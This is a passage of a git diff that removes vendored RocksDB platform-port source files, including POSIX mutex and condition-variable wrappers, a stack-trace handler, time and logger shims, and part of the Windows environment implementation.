-extern bool Snappy_Compress(const char* input, size_t input_length,
-                            std::string* output);
-
-// If input[0,input_length-1] looks like a valid snappy compressed
-// buffer, store the size of the uncompressed data in *result and
-// return true.  Else return false.
-extern bool Snappy_GetUncompressedLength(const char* input, size_t length,
-                                         size_t* result);
-
-// Attempt to snappy uncompress input[0,input_length-1] into *output.
-// Returns true if successful, false if the input is invalid lightweight
-// compressed data.
-//
-// REQUIRES: at least the first "n" bytes of output[] must be writable
-// where "n" is the result of a successful call to
-// Snappy_GetUncompressedLength.
-extern bool Snappy_Uncompress(const char* input_data, size_t input_length,
-                              char* output);
-
-}  // namespace port
-}  // namespace rocksdb
-
-#endif  // STORAGE_LEVELDB_PORT_PORT_EXAMPLE_H_
diff --git a/thirdparty/rocksdb/port/port_posix.cc b/thirdparty/rocksdb/port/port_posix.cc
deleted file mode 100644
index 129933b..0000000
--- a/thirdparty/rocksdb/port/port_posix.cc
+++ /dev/null
@@ -1,207 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "port/port_posix.h"
-
-#include <assert.h>
-#if defined(__i386__) || defined(__x86_64__)
-#include <cpuid.h>
-#endif
-#include <errno.h>
-#include <sched.h>
-#include <signal.h>
-#include <stdio.h>
-#include <string.h>
-#include <sys/time.h>
-#include <sys/resource.h>
-#include <unistd.h>
-#include <cstdlib>
-#include "util/logging.h"
-
-namespace rocksdb {
-namespace port {
-
-static int PthreadCall(const char* label, int result) {
-  if (result != 0 && result != ETIMEDOUT) {
-    fprintf(stderr, "pthread %s: %s\n", label, strerror(result));
-    abort();
-  }
-  return result;
-}
-
-Mutex::Mutex(bool adaptive) {
-#ifdef ROCKSDB_PTHREAD_ADAPTIVE_MUTEX
-  if (!adaptive) {
-    PthreadCall("init mutex", pthread_mutex_init(&mu_, nullptr));
-  } else {
-    pthread_mutexattr_t mutex_attr;
-    PthreadCall("init mutex attr", pthread_mutexattr_init(&mutex_attr));
-    PthreadCall("set mutex attr",
-                pthread_mutexattr_settype(&mutex_attr,
-                                          PTHREAD_MUTEX_ADAPTIVE_NP));
-    PthreadCall("init mutex", pthread_mutex_init(&mu_, &mutex_attr));
-    PthreadCall("destroy mutex attr",
-                pthread_mutexattr_destroy(&mutex_attr));
-  }
-#else
-  PthreadCall("init mutex", pthread_mutex_init(&mu_, nullptr));
-#endif // ROCKSDB_PTHREAD_ADAPTIVE_MUTEX
-}
-
-Mutex::~Mutex() { PthreadCall("destroy mutex", pthread_mutex_destroy(&mu_)); }
-
-void Mutex::Lock() {
-  PthreadCall("lock", pthread_mutex_lock(&mu_));
-#ifndef NDEBUG
-  locked_ = true;
-#endif
-}
-
-void Mutex::Unlock() {
-#ifndef NDEBUG
-  locked_ = false;
-#endif
-  PthreadCall("unlock", pthread_mutex_unlock(&mu_));
-}
-
-void Mutex::AssertHeld() {
-#ifndef NDEBUG
-  assert(locked_);
-#endif
-}
-
-CondVar::CondVar(Mutex* mu)
-    : mu_(mu) {
-    PthreadCall("init cv", pthread_cond_init(&cv_, nullptr));
-}
-
-CondVar::~CondVar() { PthreadCall("destroy cv", pthread_cond_destroy(&cv_)); }
-
-void CondVar::Wait() {
-#ifndef NDEBUG
-  mu_->locked_ = false;
-#endif
-  PthreadCall("wait", pthread_cond_wait(&cv_, &mu_->mu_));
-#ifndef NDEBUG
-  mu_->locked_ = true;
-#endif
-}
-
-bool CondVar::TimedWait(uint64_t abs_time_us) {
-  struct timespec ts;
-  ts.tv_sec = static_cast<time_t>(abs_time_us / 1000000);
-  ts.tv_nsec = static_cast<suseconds_t>((abs_time_us % 1000000) * 1000);
-
-#ifndef NDEBUG
-  mu_->locked_ = false;
-#endif
-  int err = pthread_cond_timedwait(&cv_, &mu_->mu_, &ts);
-#ifndef NDEBUG
-  mu_->locked_ = true;
-#endif
-  if (err == ETIMEDOUT) {
-    return true;
-  }
-  if (err != 0) {
-    PthreadCall("timedwait", err);
-  }
-  return false;
-}
-
-void CondVar::Signal() {
-  PthreadCall("signal", pthread_cond_signal(&cv_));
-}
-
-void CondVar::SignalAll() {
-  PthreadCall("broadcast", pthread_cond_broadcast(&cv_));
-}
-
-RWMutex::RWMutex() {
-  PthreadCall("init mutex", pthread_rwlock_init(&mu_, nullptr));
-}
-
-RWMutex::~RWMutex() { PthreadCall("destroy mutex", pthread_rwlock_destroy(&mu_)); }
-
-void RWMutex::ReadLock() { PthreadCall("read lock", pthread_rwlock_rdlock(&mu_)); }
-
-void RWMutex::WriteLock() { PthreadCall("write lock", pthread_rwlock_wrlock(&mu_)); }
-
-void RWMutex::ReadUnlock() { PthreadCall("read unlock", pthread_rwlock_unlock(&mu_)); }
-
-void RWMutex::WriteUnlock() { PthreadCall("write unlock", pthread_rwlock_unlock(&mu_)); }
-
-int PhysicalCoreID() {
-#if defined(ROCKSDB_SCHED_GETCPU_PRESENT) && defined(__x86_64__) && \
-    (__GNUC__ > 2 || (__GNUC__ == 2 && __GNUC_MINOR__ >= 22))
-  // sched_getcpu uses VDSO getcpu() syscall since 2.22. I believe Linux offers VDSO
-  // support only on x86_64. This is the fastest/preferred method if available.
-  int cpuno = sched_getcpu();
-  if (cpuno < 0) {
-    return -1;
-  }
-  return cpuno;
-#elif defined(__x86_64__) || defined(__i386__)
-  // clang/gcc both provide cpuid.h, which defines __get_cpuid(), for x86_64 and i386.
-  unsigned eax, ebx = 0, ecx, edx;
-  if (!__get_cpuid(1, &eax, &ebx, &ecx, &edx)) {
-    return -1;
-  }
-  return ebx >> 24;
-#else
-  // give up, the caller can generate a random number or something.
-  return -1;
-#endif
-}
-
-void InitOnce(OnceType* once, void (*initializer)()) {
-  PthreadCall("once", pthread_once(once, initializer));
-}
-
-void Crash(const std::string& srcfile, int srcline) {
-  fprintf(stdout, "Crashing at %s:%d\n", srcfile.c_str(), srcline);
-  fflush(stdout);
-  kill(getpid(), SIGTERM);
-}
-
-int GetMaxOpenFiles() {
-#if defined(RLIMIT_NOFILE)
-  struct rlimit no_files_limit;
-  if (getrlimit(RLIMIT_NOFILE, &no_files_limit) != 0) {
-    return -1;
-  }
-  // protect against overflow
-  if (no_files_limit.rlim_cur >= std::numeric_limits<int>::max()) {
-    return std::numeric_limits<int>::max();
-  }
-  return static_cast<int>(no_files_limit.rlim_cur);
-#endif
-  return -1;
-}
-
-void *cacheline_aligned_alloc(size_t size) {
-#if __GNUC__ < 5 && defined(__SANITIZE_ADDRESS__)
-  return malloc(size);
-#elif defined(_ISOC11_SOURCE)
-  return aligned_alloc(CACHE_LINE_SIZE, size);
-#elif ( _POSIX_C_SOURCE >= 200112L || _XOPEN_SOURCE >= 600 || defined(__APPLE__))
-  void *m;
-  errno = posix_memalign(&m, CACHE_LINE_SIZE, size);
-  return errno ? NULL : m;
-#else
-  return malloc(size);
-#endif
-}
-
-void cacheline_aligned_free(void *memblock) {
-  free(memblock);
-}
-
-
-}  // namespace port
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/port/port_posix.h b/thirdparty/rocksdb/port/port_posix.h
deleted file mode 100644
index fe0d426..0000000
--- a/thirdparty/rocksdb/port/port_posix.h
+++ /dev/null
@@ -1,210 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-//
-// See port_example.h for documentation for the following types/functions.
-
-#pragma once
-
-#include <thread>
-// size_t printf formatting named in the manner of C99 standard formatting
-// strings such as PRIu64
-// in fact, we could use that one
-#define ROCKSDB_PRIszt "zu"
-
-#define __declspec(S)
-
-#define ROCKSDB_NOEXCEPT noexcept
-
-#undef PLATFORM_IS_LITTLE_ENDIAN
-#if defined(OS_MACOSX)
-  #include <machine/endian.h>
-  #if defined(__DARWIN_LITTLE_ENDIAN) && defined(__DARWIN_BYTE_ORDER)
-    #define PLATFORM_IS_LITTLE_ENDIAN \
-        (__DARWIN_BYTE_ORDER == __DARWIN_LITTLE_ENDIAN)
-  #endif
-#elif defined(OS_SOLARIS)
-  #include <sys/isa_defs.h>
-  #ifdef _LITTLE_ENDIAN
-    #define PLATFORM_IS_LITTLE_ENDIAN true
-  #else
-    #define PLATFORM_IS_LITTLE_ENDIAN false
-  #endif
-  #include <alloca.h>
-#elif defined(OS_AIX)
-  #include <sys/types.h>
-  #include <arpa/nameser_compat.h>
-  #define PLATFORM_IS_LITTLE_ENDIAN (BYTE_ORDER == LITTLE_ENDIAN)
-  #include <alloca.h>
-#elif defined(OS_FREEBSD) || defined(OS_OPENBSD) || defined(OS_NETBSD) || \
-    defined(OS_DRAGONFLYBSD) || defined(OS_ANDROID)
-  #include <sys/endian.h>
-  #include <sys/types.h>
-  #define PLATFORM_IS_LITTLE_ENDIAN (_BYTE_ORDER == _LITTLE_ENDIAN)
-#else
-  #include <endian.h>
-#endif
-#include <pthread.h>
-
-#include <stdint.h>
-#include <string.h>
-#include <limits>
-#include <string>
-
-#ifndef PLATFORM_IS_LITTLE_ENDIAN
-#define PLATFORM_IS_LITTLE_ENDIAN (__BYTE_ORDER == __LITTLE_ENDIAN)
-#endif
-
-#if defined(OS_MACOSX) || defined(OS_SOLARIS) || defined(OS_FREEBSD) ||\
-    defined(OS_NETBSD) || defined(OS_OPENBSD) || defined(OS_DRAGONFLYBSD) ||\
-    defined(OS_ANDROID) || defined(CYGWIN) || defined(OS_AIX)
-// Use fread/fwrite/fflush on platforms without _unlocked variants
-#define fread_unlocked fread
-#define fwrite_unlocked fwrite
-#define fflush_unlocked fflush
-#endif
-
-#if defined(OS_MACOSX) || defined(OS_FREEBSD) ||\
-    defined(OS_OPENBSD) || defined(OS_DRAGONFLYBSD)
-// Use fsync() on platforms without fdatasync()
-#define fdatasync fsync
-#endif
-
-#if defined(OS_ANDROID) && __ANDROID_API__ < 9
-// fdatasync() was only introduced in API level 9 on Android. Use fsync()
-// when targeting older platforms.
-#define fdatasync fsync
-#endif
-
-namespace rocksdb {
-namespace port {
-
-// For use at db/file_indexer.h kLevelMaxIndex
-const int kMaxInt32 = std::numeric_limits<int32_t>::max();
-const uint64_t kMaxUint64 = std::numeric_limits<uint64_t>::max();
-const int64_t kMaxInt64 = std::numeric_limits<int64_t>::max();
-const size_t kMaxSizet = std::numeric_limits<size_t>::max();
-
-static const bool kLittleEndian = PLATFORM_IS_LITTLE_ENDIAN;
-#undef PLATFORM_IS_LITTLE_ENDIAN
-
-class CondVar;
-
-class Mutex {
- public:
-// We want to give users opportunity to default all the mutexes to adaptive if
-// not specified otherwise. This enables a quick way to conduct various
-// performance related experiements.
-//
-// NB! Support for adaptive mutexes is turned on by definining
-// ROCKSDB_PTHREAD_ADAPTIVE_MUTEX during the compilation. If you use RocksDB
-// build environment then this happens automatically; otherwise it's up to the
-// consumer to define the identifier.
-#ifdef ROCKSDB_DEFAULT_TO_ADAPTIVE_MUTEX
-  explicit Mutex(bool adaptive = true);
-#else
-  explicit Mutex(bool adaptive = false);
-#endif
-  ~Mutex();
-
-  void Lock();
-  void Unlock();
-  // this will assert if the mutex is not locked
-  // it does NOT verify that mutex is held by a calling thread
-  void AssertHeld();
-
- private:
-  friend class CondVar;
-  pthread_mutex_t mu_;
-#ifndef NDEBUG
-  bool locked_;
-#endif
-
-  // No copying
-  Mutex(const Mutex&);
-  void operator=(const Mutex&);
-};
-
-class RWMutex {
- public:
-  RWMutex();
-  ~RWMutex();
-
-  void ReadLock();
-  void WriteLock();
-  void ReadUnlock();
-  void WriteUnlock();
-  void AssertHeld() { }
-
- private:
-  pthread_rwlock_t mu_; // the underlying platform mutex
-
-  // No copying allowed
-  RWMutex(const RWMutex&);
-  void operator=(const RWMutex&);
-};
-
-class CondVar {
- public:
-  explicit CondVar(Mutex* mu);
-  ~CondVar();
-  void Wait();
-  // Timed condition wait.  Returns true if timeout occurred.
-  bool TimedWait(uint64_t abs_time_us);
-  void Signal();
-  void SignalAll();
- private:
-  pthread_cond_t cv_;
-  Mutex* mu_;
-};
-
-using Thread = std::thread;
-
-static inline void AsmVolatilePause() {
-#if defined(__i386__) || defined(__x86_64__)
-  asm volatile("pause");
-#elif defined(__aarch64__)
-  asm volatile("wfe");
-#elif defined(__powerpc64__)
-  asm volatile("or 27,27,27");
-#endif
-  // it's okay for other platforms to be no-ops
-}
-
-// Returns -1 if not available on this platform
-extern int PhysicalCoreID();
-
-typedef pthread_once_t OnceType;
-#define LEVELDB_ONCE_INIT PTHREAD_ONCE_INIT
-extern void InitOnce(OnceType* once, void (*initializer)());
-
-#ifndef CACHE_LINE_SIZE
-  #if defined(__s390__)
-    #define CACHE_LINE_SIZE 256U
-  #elif defined(__powerpc__) || defined(__aarch64__)
-    #define CACHE_LINE_SIZE 128U
-  #else
-    #define CACHE_LINE_SIZE 64U
-  #endif
-#endif
-
-
-extern void *cacheline_aligned_alloc(size_t size);
-
-extern void cacheline_aligned_free(void *memblock);
-
-#define ALIGN_AS(n) alignas(n)
-
-#define PREFETCH(addr, rw, locality) __builtin_prefetch(addr, rw, locality)
-
-extern void Crash(const std::string& srcfile, int srcline);
-
-extern int GetMaxOpenFiles();
-
-} // namespace port
-} // namespace rocksdb
diff --git a/thirdparty/rocksdb/port/stack_trace.cc b/thirdparty/rocksdb/port/stack_trace.cc
deleted file mode 100644
index baaf140..0000000
--- a/thirdparty/rocksdb/port/stack_trace.cc
+++ /dev/null
@@ -1,138 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-#include "port/stack_trace.h"
-
-#if defined(ROCKSDB_LITE) || !(defined(ROCKSDB_BACKTRACE) || defined(OS_MACOSX)) || \
-    defined(CYGWIN) || defined(OS_FREEBSD) || defined(OS_SOLARIS)
-
-// noop
-
-namespace rocksdb {
-namespace port {
-void InstallStackTraceHandler() {}
-void PrintStack(int first_frames_to_skip) {}
-}  // namespace port
-}  // namespace rocksdb
-
-#else
-
-#include <execinfo.h>
-#include <signal.h>
-#include <stdio.h>
-#include <stdlib.h>
-#include <string.h>
-#include <unistd.h>
-#include <cxxabi.h>
-
-namespace rocksdb {
-namespace port {
-
-namespace {
-
-#ifdef OS_LINUX
-const char* GetExecutableName() {
-  static char name[1024];
-
-  char link[1024];
-  snprintf(link, sizeof(link), "/proc/%d/exe", getpid());
-  auto read = readlink(link, name, sizeof(name) - 1);
-  if (-1 == read) {
-    return nullptr;
-  } else {
-    name[read] = 0;
-    return name;
-  }
-}
-
-void PrintStackTraceLine(const char* symbol, void* frame) {
-  static const char* executable = GetExecutableName();
-  if (symbol) {
-    fprintf(stderr, "%s ", symbol);
-  }
-  if (executable) {
-    // out source to addr2line, for the address translation
-    const int kLineMax = 256;
-    char cmd[kLineMax];
-    snprintf(cmd, kLineMax, "addr2line %p -e %s -f -C 2>&1", frame, executable);
-    auto f = popen(cmd, "r");
-    if (f) {
-      char line[kLineMax];
-      while (fgets(line, sizeof(line), f)) {
-        line[strlen(line) - 1] = 0;  // remove newline
-        fprintf(stderr, "%s\t", line);
-      }
-      pclose(f);
-    }
-  } else {
-    fprintf(stderr, " %p", frame);
-  }
-
-  fprintf(stderr, "\n");
-}
-#elif defined(OS_MACOSX)
-
-void PrintStackTraceLine(const char* symbol, void* frame) {
-  static int pid = getpid();
-  // out source to atos, for the address translation
-  const int kLineMax = 256;
-  char cmd[kLineMax];
-  snprintf(cmd, kLineMax, "xcrun atos %p -p %d  2>&1", frame, pid);
-  auto f = popen(cmd, "r");
-  if (f) {
-    char line[kLineMax];
-    while (fgets(line, sizeof(line), f)) {
-      line[strlen(line) - 1] = 0;  // remove newline
-      fprintf(stderr, "%s\t", line);
-    }
-    pclose(f);
-  } else if (symbol) {
-    fprintf(stderr, "%s ", symbol);
-  }
-
-  fprintf(stderr, "\n");
-}
-
-#endif
-
-}  // namespace
-
-void PrintStack(int first_frames_to_skip) {
-  const int kMaxFrames = 100;
-  void* frames[kMaxFrames];
-
-  auto num_frames = backtrace(frames, kMaxFrames);
-  auto symbols = backtrace_symbols(frames, num_frames);
-
-  for (int i = first_frames_to_skip; i < num_frames; ++i) {
-    fprintf(stderr, "#%-2d  ", i - first_frames_to_skip);
-    PrintStackTraceLine((symbols != nullptr) ? symbols[i] : nullptr, frames[i]);
-  }
-  free(symbols);
-}
-
-static void StackTraceHandler(int sig) {
-  // reset to default handler
-  signal(sig, SIG_DFL);
-  fprintf(stderr, "Received signal %d (%s)\n", sig, strsignal(sig));
-  // skip the top three signal handler related frames
-  PrintStack(3);
-  // re-signal to default handler (so we still get core dump if needed...)
-  raise(sig);
-}
-
-void InstallStackTraceHandler() {
-  // just use the plain old signal as it's simple and sufficient
-  // for this use case
-  signal(SIGILL, StackTraceHandler);
-  signal(SIGSEGV, StackTraceHandler);
-  signal(SIGBUS, StackTraceHandler);
-  signal(SIGABRT, StackTraceHandler);
-}
-
-}  // namespace port
-}  // namespace rocksdb
-
-#endif
diff --git a/thirdparty/rocksdb/port/stack_trace.h b/thirdparty/rocksdb/port/stack_trace.h
deleted file mode 100644
index f1d4f1f..0000000
--- a/thirdparty/rocksdb/port/stack_trace.h
+++ /dev/null
@@ -1,19 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-#pragma once
-namespace rocksdb {
-namespace port {
-
-// Install a signal handler to print callstack on the following signals:
-// SIGILL SIGSEGV SIGBUS SIGABRT
-// Currently supports linux only. No-op otherwise.
-void InstallStackTraceHandler();
-
-// Prints stack, skips skip_first_frames frames
-void PrintStack(int first_frames_to_skip = 0);
-
-}  // namespace port
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/port/sys_time.h b/thirdparty/rocksdb/port/sys_time.h
deleted file mode 100644
index 1e2ad0f..0000000
--- a/thirdparty/rocksdb/port/sys_time.h
+++ /dev/null
@@ -1,48 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-// This file is a portable substitute for sys/time.h which does not exist on
-// Windows
-
-#ifndef STORAGE_LEVELDB_PORT_SYS_TIME_H_
-#define STORAGE_LEVELDB_PORT_SYS_TIME_H_
-
-#if defined(OS_WIN) && defined(_MSC_VER)
-
-#include <time.h>
-
-namespace rocksdb {
-
-namespace port {
-
-// Avoid including winsock2.h for this definition
-typedef struct timeval {
-  long tv_sec;
-  long tv_usec;
-} timeval;
-
-void gettimeofday(struct timeval* tv, struct timezone* tz);
-
-inline struct tm* localtime_r(const time_t* timep, struct tm* result) {
-  errno_t ret = localtime_s(result, timep);
-  return (ret == 0) ? result : NULL;
-}
-}
-
-using port::timeval;
-using port::gettimeofday;
-using port::localtime_r;
-}
-
-#else
-#include <time.h>
-#include <sys/time.h>
-#endif
-
-#endif  // STORAGE_LEVELDB_PORT_SYS_TIME_H_
diff --git a/thirdparty/rocksdb/port/util_logger.h b/thirdparty/rocksdb/port/util_logger.h
deleted file mode 100644
index a8255ad..0000000
--- a/thirdparty/rocksdb/port/util_logger.h
+++ /dev/null
@@ -1,23 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#ifndef STORAGE_LEVELDB_PORT_UTIL_LOGGER_H_
-#define STORAGE_LEVELDB_PORT_UTIL_LOGGER_H_
-
-// Include the appropriate platform specific file below.  If you are
-// porting to a new platform, see "port_example.h" for documentation
-// of what the new port_<platform>.h file must provide.
-
-#if defined(ROCKSDB_PLATFORM_POSIX)
-#include "env/posix_logger.h"
-#elif defined(OS_WIN)
-#include "port/win/win_logger.h"
-#endif
-
-#endif  // STORAGE_LEVELDB_PORT_UTIL_LOGGER_H_
diff --git a/thirdparty/rocksdb/port/win/env_default.cc b/thirdparty/rocksdb/port/win/env_default.cc
deleted file mode 100644
index 52a984f..0000000
--- a/thirdparty/rocksdb/port/win/env_default.cc
+++ /dev/null
@@ -1,42 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include <mutex>
-
-#include <rocksdb/env.h>
-#include "port/win/env_win.h"
-
-namespace rocksdb {
-namespace port {
-
-// We choose to create this on the heap and using std::once for the following
-// reasons
-// 1) Currently available MS compiler does not implement atomic C++11
-// initialization of
-//    function local statics
-// 2) We choose not to destroy the env because joining the threads from the
-// system loader
-//    which destroys the statics (same as from DLLMain) creates a system loader
-//    dead-lock.
-//    in this manner any remaining threads are terminated OK.
-namespace {
-  std::once_flag winenv_once_flag;
-  Env* envptr;
-};
-
-}
-
-Env* Env::Default() {
-  using namespace port;
-  std::call_once(winenv_once_flag, []() { envptr = new WinEnv(); });
-  return envptr;
-}
-
-}
-
diff --git a/thirdparty/rocksdb/port/win/env_win.cc b/thirdparty/rocksdb/port/win/env_win.cc
deleted file mode 100644
index 4621488..0000000
--- a/thirdparty/rocksdb/port/win/env_win.cc
+++ /dev/null
@@ -1,1127 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "port/win/env_win.h"
-#include "port/win/win_thread.h"
-#include <algorithm>
-#include <ctime>
-#include <thread>
-
-#include <errno.h>
-#include <process.h> // _getpid
-#include <io.h> // _access
-#include <direct.h> // _rmdir, _mkdir, _getcwd
-#include <sys/types.h>
-#include <sys/stat.h>
-
-#include "rocksdb/env.h"
-#include "rocksdb/slice.h"
-
-#include "port/port.h"
-#include "port/dirent.h"
-#include "port/win/win_logger.h"
-#include "port/win/io_win.h"
-
-#include "monitoring/iostats_context_imp.h"
-
-#include "monitoring/thread_status_updater.h"
-#include "monitoring/thread_status_util.h"
-
-#include <rpc.h>  // for uuid generation
-#include <windows.h>
-
-namespace rocksdb {
-
-ThreadStatusUpdater* CreateThreadStatusUpdater() {
-  return new ThreadStatusUpdater();
-}
-
-namespace {
-
-// RAII helpers for HANDLEs
-const auto CloseHandleFunc = [](HANDLE h) { ::CloseHandle(h); };
-typedef std::unique_ptr<void, decltype(CloseHandleFunc)> UniqueCloseHandlePtr;
-
-void WinthreadCall(const char* label, std::error_code result) {
-  if (0 != result.value()) {
-    fprintf(stderr, "pthread %s: %s\n", label, strerror(result.value()));
-    abort();
-  }
-}
-
-}
-
-namespace port {
-
-WinEnvIO::WinEnvIO(Env* hosted_env)
-  :   hosted_env_(hosted_env),
-      page_size_(4 * 1012),
-      allocation_granularity_(page_size_),
-      perf_counter_frequency_(0),
-      GetSystemTimePreciseAsFileTime_(NULL) {
-
-  SYSTEM_INFO sinfo;
-  GetSystemInfo(&sinfo);
-
-  page_size_ = sinfo.dwPageSize;
-  allocation_granularity_ = sinfo.dwAllocationGranularity;
-
-  {
-    LARGE_INTEGER qpf;
-    BOOL ret = QueryPerformanceFrequency(&qpf);
-    assert(ret == TRUE);
-    perf_counter_frequency_ = qpf.QuadPart;
-  }
-
-  HMODULE module = GetModuleHandle("kernel32.dll");
-  if (module != NULL) {
-    GetSystemTimePreciseAsFileTime_ = (FnGetSystemTimePreciseAsFileTime)GetProcAddress(
-      module, "GetSystemTimePreciseAsFileTime");
-  }
-}
-
-WinEnvIO::~WinEnvIO() {
-}
-
-Status WinEnvIO::DeleteFile(const std::string& fname) {
-  Status result;
-
-  if (_unlink(fname.c_str())) {
-    result = IOError("Failed to delete: " + fname, errno);
-  }
-
-  return result;
-}
-
-Status WinEnvIO::GetCurrentTime(int64_t* unix_time) {
-  time_t time = std::time(nullptr);
-  if (time == (time_t)(-1)) {
-    return Status::NotSupported("Failed to get time");
-  }
-
-  *unix_time = time;
-  return Status::OK();
-}
-
-Status WinEnvIO::NewSequentialFile(const std::string& fname,
-  std::unique_ptr<SequentialFile>* result,
-  const EnvOptions& options) {
-  Status s;
-
-  result->reset();
-
-  // Corruption test needs to rename and delete files of these kind
-  // while they are still open with another handle. For that reason we
-  // allow share_write and delete(allows rename).
-  HANDLE hFile = INVALID_HANDLE_VALUE;
-
-  DWORD fileFlags = FILE_ATTRIBUTE_READONLY;
-
-  if (options.use_direct_reads && !options.use_mmap_reads) {
-    fileFlags |= FILE_FLAG_NO_BUFFERING;
-  }
-
-  {
-    IOSTATS_TIMER_GUARD(open_nanos);
-    hFile = CreateFileA(
-      fname.c_str(), GENERIC_READ,
-      FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE, NULL,
-      OPEN_EXISTING,  // Original fopen mode is "rb"
-      fileFlags, NULL);
-  }
-
-  if (INVALID_HANDLE_VALUE == hFile) {
-    auto lastError = GetLastError();
-    s = IOErrorFromWindowsError("Failed to open NewSequentialFile" + fname,
-      lastError);
-  } else {
-    result->reset(new WinSequentialFile(fname, hFile, options));
-  }
-  return s;
-}
-
-Status WinEnvIO::NewRandomAccessFile(const std::string& fname,
-  std::unique_ptr<RandomAccessFile>* result,
-  const EnvOptions& options) {
-  result->reset();
-  Status s;
-
-  // Open the file for read-only random access
-  // Random access is to disable read-ahead as the system reads too much data
-  DWORD fileFlags = FILE_ATTRIBUTE_READONLY;
-
-  if (options.use_direct_reads && !options.use_mmap_reads) {
-    fileFlags |= FILE_FLAG_NO_BUFFERING;
-  } else {
-    fileFlags |= FILE_FLAG_RANDOM_ACCESS;
-  }
-
-  /// Shared access is necessary for corruption test to pass
-  // almost all tests would work with a possible exception of fault_injection
-  HANDLE hFile = 0;
-  {
-    IOSTATS_TIMER_GUARD(open_nanos);
-    hFile =
-      CreateFileA(fname.c_str(), GENERIC_READ,
-      FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE,
-      NULL, OPEN_EXISTING, fileFlags, NULL);
-  }
-
-  if (INVALID_HANDLE_VALUE == hFile) {
-    auto lastError = GetLastError();
-    return IOErrorFromWindowsError(
-      "NewRandomAccessFile failed to Create/Open: " + fname, lastError);
-  }
-
-  UniqueCloseHandlePtr fileGuard(hFile, CloseHandleFunc);
-
-  // CAUTION! This will map the entire file into the process address space
-  if (options.use_mmap_reads && sizeof(void*) >= 8) {
-    // Use mmap when virtual address-space is plentiful.
-    uint64_t fileSize;
-
-    s = GetFileSize(fname, &fileSize);
-
-    if (s.ok()) {
-      // Will not map empty files
-      if (fileSize == 0) {
-        return IOError(
-          "NewRandomAccessFile failed to map empty file: " + fname, EINVAL);
-      }
-
-      HANDLE hMap = CreateFileMappingA(hFile, NULL, PAGE_READONLY,
-        0,  // Whole file at its present length
-        0,
-        NULL);  // Mapping name
-
-      if (!hMap) {
-        auto lastError = GetLastError();
-        return IOErrorFromWindowsError(
-          "Failed to create file mapping for NewRandomAccessFile: " + fname,
-          lastError);
-      }
-
-      UniqueCloseHandlePtr mapGuard(hMap, CloseHandleFunc);
-
-      const void* mapped_region =
-        MapViewOfFileEx(hMap, FILE_MAP_READ,
-        0,  // High DWORD of access start
-        0,  // Low DWORD
-        fileSize,
-        NULL);  // Let the OS choose the mapping
-
-      if (!mapped_region) {
-        auto lastError = GetLastError();
-        return IOErrorFromWindowsError(
-          "Failed to MapViewOfFile for NewRandomAccessFile: " + fname,
-          lastError);
-      }
-
-      result->reset(new WinMmapReadableFile(fname, hFile, hMap, mapped_region,
-        fileSize));
-
-      mapGuard.release();
-      fileGuard.release();
-    }
-  } else {
-    result->reset(new WinRandomAccessFile(fname, hFile, page_size_, options));
-    fileGuard.release();
-  }
-  return s;
-}
-
-Status WinEnvIO::OpenWritableFile(const std::string& fname,
-  std::unique_ptr<WritableFile>* result,
-  const EnvOptions& options,
-  bool reopen) {
-
-  const size_t c_BufferCapacity = 64 * 1024;
-
-  EnvOptions local_options(options);
-
-  result->reset();
-  Status s;
-
-  DWORD fileFlags = FILE_ATTRIBUTE_NORMAL;
-
-  if (local_options.use_direct_writes && !local_options.use_mmap_writes) {
-    fileFlags = FILE_FLAG_NO_BUFFERING;
-  }
-
-  // Desired access. We are want to write only here but if we want to memory
-  // map
